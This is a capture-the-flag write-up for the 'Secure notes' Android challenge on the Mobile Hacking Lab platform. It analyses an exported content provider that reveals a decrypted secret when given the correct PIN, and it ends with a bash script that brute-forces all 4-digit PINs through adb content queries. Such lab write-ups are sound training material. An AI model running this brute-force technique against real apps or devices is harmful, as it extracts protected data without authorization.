Secure notes

Hello everyone , In this blog post , I will try to explain my solution steps for Secure notes challenge from Mobile Hacking Lab Platform . i hope it will be useful for you

  1. Letโ€™s Examine the AndroidMainfest.xml

  2. After That i found 2 Providers ( com.mobilehackinglab.securenotes.secretprovider - androidx.startup.InitializationProvider) and 1 exported Activity (MainActivity )

    image.png

  3. The MainActivity interact with a content provider, to validate a PIN and retrieve a secret value associated with that PIN.

  4. there is a listener set on a submitPinButton,

    1. when click the code call onCreate$lambda$0 () function ,,

    2. then it , which retrieves the text from pinEditText

    3. then use querySecretProvider to validate the entered pin

  5. Letโ€™s analysis the com.mobilehackinglab.securenotes.SecretDataProvider :

    1. first of all the correct Pin use a key to decrypt the data stored in config.properties file

    2. then letโ€™s keep going in our code

    3. it take a query string

    4. check for if it null , return null

    5. if there is a value then remove the prefix and then extract the int number from it

    6. in the end it invoke the decryptSecret()

    7. if the Cursor return valid , the code look for secret column to query the pin

    8. If a valid cursor is returned and data is available, the code looks for a column named "Secret", expecting this to hold the result of the query.

  6. Letโ€™s back to the config.properties file and try to decrypt it manual

  7. Letโ€™s try to brute force the pinget the decrypted Text

    #!/bin/bash

# Define the content provider URI
CONTENT_URI="content://com.mobilehackinglab.securenotes.secretprovider"

# Loop through all 4-digit PIN combinations (0000 to 9999)
for pin in $(seq -w 0000 9999); do
    echo "Trying PIN: $pin"

    # Use ADB to send the query command to the content provider
    adb shell content query --uri "$CONTENT_URI" --where "pin=$pin"

    # Check the output to see if it indicates a successful attempt
    # Assuming "Secret" is returned upon success, otherwise adjust the condition
    if adb shell content query --uri "$CONTENT_URI" --where "pin=$pin" | grep -q "Secret"; then
        echo "PIN found: $pin"
        break
    fi
done
PreviousGuess meNextPost Board

Last updated